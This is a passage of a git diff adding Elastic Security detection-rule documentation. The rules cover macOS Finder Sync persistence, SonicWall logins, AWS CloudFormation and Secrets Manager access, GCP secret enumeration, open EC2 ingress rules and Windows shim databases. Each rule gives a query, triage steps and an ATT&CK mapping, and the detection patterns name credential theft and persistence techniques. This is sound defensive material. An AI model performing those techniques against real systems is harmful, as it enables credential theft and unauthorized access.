behavior and origin of the executable associated with the suspicious plugin to assess its legitimacy and potential threat level. +- Review system logs and other security alerts around the time of the plugin registration to identify any correlated suspicious activities or anomalies. + + +*False positive analysis* + + +- Known safe applications like Google Drive, Boxcryptor, Adobe, Microsoft OneDrive, Insync, and Box are already excluded from triggering false positives. Ensure these applications are up-to-date to maintain their exclusion status. +- If a legitimate application not listed in the exclusions is causing false positives, consider adding its specific Finder Sync plugin identifier to the exclusion list after verifying its safety. +- Monitor the parent process paths of legitimate applications. If a trusted application frequently triggers alerts, add its executable path to the exclusion list to prevent unnecessary alerts. +- Regularly review and update the exclusion list to accommodate new versions or additional legitimate applications that may introduce Finder Sync plugins. +- Educate users on the importance of installing applications from trusted sources to minimize the risk of false positives and ensure that only legitimate plugins are registered. + + +*Response and remediation* + + +- Immediately isolate the affected macOS system from the network to prevent potential lateral movement or data exfiltration by the malicious Finder Sync plugin. +- Terminate the suspicious `pluginkit` process to stop the execution of the rogue Finder Sync plugin and prevent further persistence. +- Remove the malicious Finder Sync plugin by unregistering it using the `pluginkit` command with appropriate flags to ensure it cannot be re-enabled. +- Conduct a thorough scan of the system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malicious payloads or artifacts. +- Review system logs and the Finder Sync plugin registration history to identify any unauthorized changes or additional compromised systems. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if the threat is part of a larger attack campaign. +- Implement enhanced monitoring for `pluginkit` activity and similar persistence mechanisms to detect and respond to future attempts promptly. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "pluginkit" and + process.args == "-e" and process.args like~ "use" and process.args == "-i" and + (process.parent.name like~ ("python*", "node", "osascript", "bash", "sh", "zsh") or (process.parent.code_signature.exists == false or process.parent.code_signature.trusted == false)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc new file mode 100644 index 0000000000..70fc974d7c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source]] +=== First Seen SonicWall Remote Access Login by User and Source + +Identifies a successful SonicWall VPN- or WAN-zone administrator or remote-user login from a source IP that was not previously observed with the same user on the same appliance during the prior 14 days. This may indicate stolen credentials, compromised administrator access, or unauthorized remote access. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-sonicwall_firewall.log-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/docs/reference/integrations/sonicwall_firewall +* https://www.sonicwall.com/support/knowledge-base/monitoring-sslvpn-user-logins/kA1VN0000000JQz0AM +* https://www.huntress.com/blog/sonicwall-credential-stuffing-campaign + +*Tags*: + +* Domain: Network +* Domain: Identity +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Data Source: SonicWall Firewall Logs +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Seen SonicWall Remote Access Login by User and Source* + + +This rule detects a newly observed combination of SonicWall appliance serial number, user name, and source IP for a +successful VPN- or WAN-zone login. Event IDs `235` and `236` are administrator logins from VPN and WAN zones, `237` and +`238` are remote-user logins from VPN and WAN zones, and `1080` is a successful SSL VPN user login. + + +*Possible investigation steps* + + +- Confirm the user, source IP, appliance, login type, VPN policy, MFA result, and assigned tunnel address. +- Review the source geolocation, reputation, and prior authentication activity. +- Correlate with failed logins, configuration changes, internal reconnaissance, and endpoint activity. +- Prefer exceptions scoped to the appliance, user, and expected source rather than globally excluding an identity. + + +*False positive analysis* + + +- Validate new users, travel, ISP address changes, managed service provider activity, and integration onboarding before + treating the alert as unauthorized access. + + +*Response and remediation* + + +- If unauthorized access is suspected, terminate active sessions, disable the affected account, rotate credentials and + tokens, verify MFA, and review downstream activity from the assigned tunnel address. +- Preserve SonicWall authentication, VPN session, and configuration audit logs before making broad changes. + + +==== Setup + + + +*Setup* + + +This rule requires the Elastic SonicWall Firewall integration and SonicWall Enhanced Syslog authentication events. +Configure the appliance to forward **Users > Authentication Access** events, including event IDs `235`, `236`, `237`, +`238`, and `1080`. Verify that the integration populates `data_stream.dataset`, `event.action`, `event.code`, +`source.ip`, `user.name`, and `observer.serial_number`. + +The new-terms key requires `observer.serial_number`. Events without that field do not match. Ensure serial numbers are +stable and unique across tenants in a shared Kibana space. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:"sonicwall_firewall.log" and + event.action:"login-success" and + event.code:("235" or "236" or "237" or "238" or "1080") and + source.ip:* and user.name:* and observer.serial_number:* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation.asciidoc new file mode 100644 index 0000000000..3c04437ab8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation]] +=== First Time AWS CloudFormation Stack Creation + +This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/stacksets-concepts.html +* https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateStack.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudFormation +* Tactic: Execution +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time AWS CloudFormation Stack Creation* + + +AWS CloudFormation automates the setup of cloud resources using templates, streamlining infrastructure management. Adversaries with access can exploit this to deploy malicious resources, escalating their control. The detection rule identifies unusual activity by flagging the initial use of stack creation APIs by a user or role, helping to spot potential unauthorized actions early. + + +*Possible investigation steps* + + +- Review `aws.cloudtrail.user_identity.arn` to identify the user or role that initiated the `CreateStack` or `CreateStackInstances` action. +- Verify the IAM permissions of the user or role involved in the event to ensure they have the appropriate level of access and determine if the action aligns with their typical responsibilities. +- Examine the stack template used to identify any unusual or unauthorized resources being provisioned. +- Investigate any related resources that were deployed as part of the stack. +- Correlate the timing of the stack creation with other logs or alerts to identify any suspicious activity or patterns that might indicate malicious intent. +- Investigate the account's recent activity history to determine if there have been any other first-time or unusual actions by the same user or role. + + +*False positive analysis* + + +- Routine infrastructure updates by authorized users may trigger the rule. To manage this, maintain a list of users or roles that regularly perform these updates and create exceptions for them. +- Automated deployment tools or scripts that use CloudFormation for legitimate purposes can cause false positives. Identify these tools and exclude their associated IAM roles or users from the rule. +- New team members or roles onboarding into cloud management tasks might be flagged. Implement a process to review and whitelist these users after verifying their activities. +- Scheduled or periodic stack creations for testing or development environments can be mistaken for suspicious activity. Document these schedules and exclude the relevant users or roles from the rule. +- Third-party services or integrations that require stack creation permissions could be misidentified. Ensure these services are documented and their actions are excluded from triggering the rule. + + +*Response and remediation* + + +- Immediately isolate the IAM user or role that initiated the stack creation to prevent further unauthorized actions. This can be done by revoking permissions with a https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[DenyAll] permissions policy or disabling the account temporarily. +- Review the created stack for any unauthorized or suspicious resources. Identify and terminate any resources that are not part of the expected infrastructure. +- Conduct a thorough audit of recent IAM activity to identify any other unusual or unauthorized actions that may indicate further compromise. +- If malicious activity is confirmed, escalate the incident to the security operations team for a full investigation and potential involvement of incident response teams. +- Implement additional monitoring and alerting for the affected account to detect any further unauthorized attempts to use CloudFormation or other critical AWS services. +- Review and tighten IAM policies and permissions to ensure that only necessary privileges are granted, reducing the risk of exploitation by adversaries. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and event.provider:cloudformation.amazonaws.com and + event.action: (CreateStack or CreateStackInstances) + and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ +* Technique: +** Name: Cloud Administration Command +** ID: T1651 +** Reference URL: https://attack.mitre.org/techniques/T1651/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc new file mode 100644 index 0000000000..671e5671f6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc @@ -0,0 +1,139 @@ +[[prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager]] +=== First Time Seen AWS Secret Value Accessed in Secrets Manager + +An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html +* https://detectioninthe.cloud/ttps/credential_access/access_secret_in_secrets_manager/ +* https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_BatchGetSecretValue.html +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Secrets Manager +* Tactic: Credential Access +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 320 + +*Rule authors*: + +* Nick Jones +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Seen AWS Secret Value Accessed in Secrets Manager* + + +AWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with an API call to Secrets Manager to retrieve the secret programmatically. + +This rule looks for the retrieval of credentials from Secrets Manager using `GetSecretValue` API calls. This is a https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule[New Terms] rule indicating this is the first time a specific user identity has successfuly retrieved a secret value from Secrets Manager. + + +*Possible investigation steps* + + +- Identify the account and its role in the environment, and inspect the related policy. +- Identify the applications that should use this account. +- Investigate other alerts associated with the user account during the past 48 hours. +- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage and historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users. +- Contact the account owner and confirm whether they are aware of this activity. +- Considering the source IP address and geolocation of the user who issued the command: + - Do they look normal for the calling user? + - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control? + - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance? +- Review IAM permission policies for the user identity and specific secrets accessed. +- Examine the request parameters. These might indicate the source of the program or the nature of its tasks. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- Review `entity.id` values for expected combinations of identity and secret value access. If this is an expected behavior, consider adding exceptions to the rule. +- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher confidence. Consider adding exceptions — preferably with a combination of user agent and IP address conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed. +- Implement security best practices https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[outlined] by AWS. +- Take the actions needed to return affected systems, data, or services to their normal operational levels. +- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: secretsmanager.amazonaws.com + and event.action: GetSecretValue + and event.outcome: success + and not user_agent.original: *Fargate* + and not user.id: AWSServiceRole* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc new file mode 100644 index 0000000000..3b9ee13ebf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects]] +=== GCP Secret Manager ListSecrets Across Multiple Projects + +Detects a single identity listing Google Cloud Secret Manager secrets across many distinct projects in a short window. ListSecrets does not return secret values, but sweeping many projects is a common reconnaissance step before targeted AccessSecretVersion calls. Legitimate workloads typically list secrets within one project or a small set of projects; cross-project bursts from one user and source IP are uncommon outside security tooling or compromise. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.google.com/secret-manager/docs/reference/rest/v1/projects.secrets/list + +*Tags*: + +* Domain: Cloud +* Data Source: GCP +* Data Source: Google Cloud Platform +* Data Source: GCP Audit Logs +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Rule Type: ESQL +* Platform: GCP +* Service: GCP Secret Manager + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GCP Secret Manager ListSecrets Across Multiple Projects* + + +This rule aggregates Secret Manager `ListSecrets` audit events per `client.user.email` and `source.ip` over the rule +lookback. It alerts when the same actor lists secrets in 10 or more distinct `cloud.project.id` values. Listing does +not retrieve secret payloads, but multi-project enumeration is a strong discovery signal ahead of credential access. + + +*Possible investigation steps* + + +- Review `Esql.cloud_project_id_values` to identify which projects were + enumerated and whether they include high-value or production workloads. +- Confirm whether `client.user.email`, `source.ip`, and + `Esql.user_agent_original_values` match expected administrators, CI/CD, or approved security scanners. +- Check `Esql.event_outcome_values` for mixed success and failure, which can indicate permission probing across projects + the identity cannot fully access. +- Hunt for follow-on Secret Manager activity from the same identity or IP, especially + `AccessSecretVersion`, `GetSecret`, and IAM policy changes on secrets or projects. +- Bound the burst with `Esql.earliest_timestamp` and `Esql.latest_timestamp`, then pivot in Discover on the same + `client.user.email` / `source.ip` for related GCP audit activity. + + +*False positive analysis* + + +- Documented CSPM, secret inventory, or compliance scanners that walk many projects will match; exclude those + principals after validation. +- Break-glass or org-admin troubleshooting can look similar; require change-management correlation before raising + severity. + + +*Response and remediation* + + +- If unauthorized, revoke or rotate the implicated credentials, review IAM bindings that grant + `secretmanager.secrets.list` across projects, and inspect for subsequent secret access or exfiltration. +- Restrict Secret Manager list permissions to least privilege and prefer per-project roles over org-wide grants for + human users. + + +==== Setup + + +The GCP Fleet integration (or Filebeat module) with audit logs for Secret Manager is required. `ListSecrets` is a +data-access method; enable DATA_READ audit logging for the Secret Manager API so these events are ingested into +`logs-gcp.audit-*`. + +See https://cloud.google.com/secret-manager/docs/audit-logging[Secret Manager audit logging] and +https://cloud.google.com/logging/docs/audit/configure-data-access[Configure Data Access audit logs]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-gcp.audit-* metadata _id, _version, _index +| where data_stream.dataset == "gcp.audit" + and event.action == "google.cloud.secretmanager.v1.SecretManagerService.ListSecrets" + and cloud.project.id is not null + and client.user.email is not null + and source.ip is not null +| stats + Esql.cloud_project_id_count_distinct = count_distinct(cloud.project.id), + Esql.cloud_project_id_values = values(cloud.project.id), + Esql.event_count = count(*), + Esql.event_outcome_values = values(event.outcome), + Esql.client_user_id_values = values(client.user.id), + Esql.user_agent_original_values = values(user_agent.original), + Esql.earliest_timestamp = min(@timestamp), + Esql.latest_timestamp = max(@timestamp) + by client.user.email, source.ip, data_stream.namespace +| where Esql.cloud_project_id_count_distinct >= 10 +| keep + client.user.email, + source.ip, + Esql.cloud_project_id_count_distinct, + Esql.cloud_project_id_values, + Esql.event_count, + Esql.event_outcome_values, + Esql.client_user_id_values, + Esql.user_agent_original_values, + Esql.earliest_timestamp, + Esql.latest_timestamp, + data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Service Discovery +** ID: T1526 +** Reference URL: https://attack.mitre.org/techniques/T1526/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc new file mode 100644 index 0000000000..fe49c628e4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added]] +=== Insecure AWS EC2 VPC Security Group Ingress Rule Added + +Identifies when a specified inbound (ingress) rule is added or adjusted for a VPC security group in AWS EC2. This rule detects when a security group rule is added that allows traffic from any IP address or from a specific IP address to common remote access ports, such as 22 (SSH) or 3389 (RDP). Adversaries may add these rules to allow remote access to VPC instances from any location, increasing the attack surface and potentially exposing the instances to unauthorized access. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_AuthorizeSecurityGroupEgress.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_AuthorizeSecurityGroupIngress.html +* https://www.linkedin.com/pulse/my-backdoors-your-aws-infrastructure-part-3-network-micha%C5%82-brygidyn/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Insecure AWS EC2 VPC Security Group Ingress Rule Added* + + +This rule detects the addition of ingress rules to a VPC security group that allow traffic from any IP address (`0.0.0.0/0` or `::/0`) to sensitive ports commonly used for remote access, such as SSH (port 22) and RDP (port 3389). This configuration change can significantly increase the exposure of EC2 instances to potential threats, making it crucial to understand the context and legitimacy of such changes. + + +*Possible Investigation Steps:* + + +- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who made the change. Investigate whether this actor has the necessary permissions and typically performs these actions. +- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand exactly what changes were made to the security group. Check for any unusual parameters that could suggest a misconfiguration or malicious intent. +- **Analyze the Source of the Request**: Look at the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unusual location could indicate compromised credentials. +- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the change occurred. Modifications outside of typical business hours might warrant additional scrutiny. +- **Correlate with Other Activities**: Search for related CloudTrail events before and after this change to see if the same actor engaged in other potentially suspicious activities. + + +*False Positive Analysis:* + + +- **Legitimate Administrative Actions**: Verify if the ingress rule change aligns with scheduled updates, maintenance activities, or legitimate administrative tasks documented in change management tickets or systems. +- **Consistency Check**: Compare the action against historical data of similar actions performed by the user or within the organization. Consistency with past legitimate actions might indicate a false alarm. +- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the change was successful and intended as per policy. + + +*Response and Remediation:* + + +- **Immediate Review and Reversal if Necessary**: If the change was unauthorized, revert the security group rules to their previous state to close any unintended access. +- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar security group changes, especially those that open access to well-known ports from any IP address. +- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning security group management. +- **Audit Security Groups and Policies**: Conduct a comprehensive audit of all security groups and associated policies to ensure they adhere to the principle of least privilege. +- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences. + + +*Additional Information:* + + +For further guidance on managing security group rules and securing AWS environments, refer to the https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html[Amazon VPC Security Groups documentation] and AWS best practices for security. + + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: ec2.amazonaws.com + and event.action: AuthorizeSecurityGroupIngress + and event.outcome: success + and aws.cloudtrail.flattened.request_parameters.ipPermissions.items.ipRanges.items.cidrIp: ("0.0.0.0/0" or "::/0") + and aws.cloudtrail.flattened.request_parameters.ipPermissions.items.fromPort: ( + 21 or 22 or 23 or 445 or 3389 or 5985 or 5986) + and not user_agent.original: (*packer-plugin-amazon* or *Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc new file mode 100644 index 0000000000..554cfe2056 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-32-installation-of-custom-shim-databases]] +=== Installation of Custom Shim Databases + +Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.registry-* +* winlogbeat-* +* logs-windows.sysmon_operational-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: Microsoft Defender XDR +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 316 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Installation of Custom Shim Databases* + + +Application Compatibility Shim databases are used in Windows to ensure older applications run smoothly on newer OS versions by applying compatibility fixes. However, attackers can exploit this feature to maintain persistence and execute arbitrary code by installing malicious shim databases. The detection rule identifies changes in specific registry paths associated with these databases, excluding known legitimate processes, to flag potential abuse. + + +*Possible investigation steps* + + +- Review the registry path changes identified in the alert to confirm the presence of any unexpected or unauthorized .sdb files in the specified registry paths. +- Investigate the process that made the registry change by examining the process executable path and comparing it against the list of known legitimate processes excluded in 